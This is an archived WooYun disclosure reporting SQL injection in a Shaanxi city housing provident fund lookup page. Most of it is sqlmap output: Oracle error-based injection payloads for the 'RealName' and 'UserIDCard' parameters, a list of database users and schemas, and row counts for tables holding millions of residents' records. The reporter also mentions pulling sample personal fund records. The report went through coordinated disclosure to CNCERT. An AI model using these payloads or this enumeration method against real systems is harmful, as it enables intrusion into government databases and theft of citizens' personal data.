当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141205

漏洞标题:陕西省某市住房公积金系统存在SQL注入(涉及9个数据库\几十万用户公积金缴纳信息)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-17 09:42

修复时间:2015-11-03 18:36

公开时间:2015-11-03 18:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-19: 厂商已经确认,细节仅向厂商公开
2015-09-29: 细节向核心白帽子及相关领域专家公开
2015-10-09: 细节向普通白帽子公开
2015-10-19: 细节向实习白帽子公开
2015-11-03: 细节向公众公开

简要描述:

存在SQL注入

详细说明:

http://**.**.**.**/chaxun_geren.asp


查找个人的,这里有注入

[01:06:47] [INFO] testing connection to the target URL
[01:06:48] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[01:06:50] [INFO] target URL is stable
[01:06:50] [INFO] testing if POST parameter 'RealName' is dynamic
[01:06:50] [WARNING] POST parameter 'RealName' does not appear dynamic
[01:06:50] [INFO] heuristic (basic) test shows that POST parameter 'RealName' mi
ght be injectable (possible DBMS: 'Oracle')
[01:06:50] [INFO] testing for SQL injection on POST parameter 'RealName'
[01:06:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:06:55] [WARNING] reflective value(s) found and filtering out
[01:06:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:07:00] [INFO] POST parameter 'RealName' is 'Oracle AND error-based - WHERE o
r HAVING clause (XMLType)' injectable
[01:07:07] [INFO] testing 'Oracle inline queries'
[01:07:07] [INFO] testing 'Oracle AND time-based blind'
[01:07:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:07:07] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[01:07:08] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[01:07:10] [INFO] target URL appears to have 1 column in query
POST parameter 'RealName' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[01:07:14] [INFO] testing if POST parameter 'UserIDCard' is dynamic
[01:07:14] [WARNING] POST parameter 'UserIDCard' does not appear dynamic
[01:07:15] [INFO] heuristic (basic) test shows that POST parameter 'UserIDCard'
might be injectable (possible DBMS: 'Oracle')
[01:07:15] [INFO] testing for SQL injection on POST parameter 'UserIDCard'
[01:07:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:07:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[01:07:25] [INFO] POST parameter 'UserIDCard' is 'Oracle AND error-based - WHERE
or HAVING clause (XMLType)' injectable
[01:07:25] [INFO] testing 'Oracle inline queries'
[01:07:25] [INFO] testing 'Oracle AND time-based blind'
[01:07:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'UserIDCard' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requ
ests:
---
Place: POST
Parameter: RealName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: RealName=111' AND 7087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (7087=7087) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CH
R(62))) FROM DUAL) AND 'AcMJ'='AcMJ&UserIDCard=222&GetType=0&button= %B2%E9%D1%
AF
Place: POST
Parameter: UserIDCard
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: RealName=111&UserIDCard=222' AND 2427=(SELECT UPPER(XMLType(CHR(60)
||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN
(2427=2427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114
)||CHR(113)||CHR(62))) FROM DUAL) AND 'RJbB'='RJbB&GetType=0&button= %B2%E9%D1%
AF
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: RealName, type: Single quoted string (default)
[1] place: POST, parameter: UserIDCard, type: Single quoted string
[q] Quit
> 0
[01:07:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5
back-end DBMS: Oracle
[01:07:46] [INFO] fetching current user
[01:07:46] [INFO] retrieved: XYS_DATA
current user: 'XYS_DATA'
[01:07:46] [INFO] fetching current database
[01:07:46] [INFO] resumed: XYS_DATA
[01:07:46] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'XYS_DATA'
[01:07:46] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [42]:
[*] AMBULANCE
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] BI
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FAREN
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OCCIWRAPPER
[*] OE
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] PM
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TAIJI
[*] WMSYS
[*] XDB
[*] XS$NULL
[*] XYS_DATA
[*] XYS_DATA_IMPORT
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
[*] XYS_DATA
Database: XYS_DATA
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| TBL_BASE_POPULATION | 7505097 |
| TBL_SHEET_INFO_14 | 5186324 |
| BAK_SHEET_INFO_13 | 5178531 |
| WJW_EXTEND_CZRKPERSON | 4946198 |
| BAK_BASE_POPULATION | 3770536 |
| TBL_SHEET_INFO_4 | 3710291 |
| WJW_EXTEND_LDRKPERSON | 398605 |
| TBL_SHEET_INFO_3 | 380000 |
| TBL_SHEET_INFO_8 | 376036 |
| TBL_SHEET_INFO_11 | 371212 |
| GJJ_EXTENDS_PERSON | 357117 |
| TBL_SHEET_INFO_9 | 312138 |
| YGT_EXTEND_POPULATION | 200185 |
| TBL_BASE_ENTERPRISE | 73195 |
| TBL_SHEET_INFO_22 | 45827 |
| TBL_SHEET_INFO_6 | 13468 |
| YGT_EXTEND_ENTERPRISE | 5680 |
| TBL_SHEET_INFO_26 | 1015 |
| TBL_SHEET_INFO_25 | 164 |
| TBL_SHEET_INFO_16 | 107 |
| TBL_SHEET_INFO_30 | 61 |
| TBL_SHEET_INFO_15 | 40 |
| TBL_SHEET_INFO_17 | 34 |
| TBL_SHEET_INFO_29 | 4 |
| TBL_SHEET_INFO_18 | 1 |
+-----------------------+---------+


| GJJ_EXTENDS_PERSON    | 357117  |
| WJW_EXTEND_CZRKPERSON | 4946198 |
| WJW_EXTEND_LDRKPERSON | 398605 |


测试GJJ_EXTENDS_PERSON中的10个看看,可以看到每个月缴纳的公积金以及公积金综合,还有一些相关信息,不知道算不算敏感?

1.jpg


http://**.**.**.**/bugs/wooyun-2015-0129844
这里面提到的
DepartmentName和DepartmentNum还没有修复!~~~

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-19 18:34

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无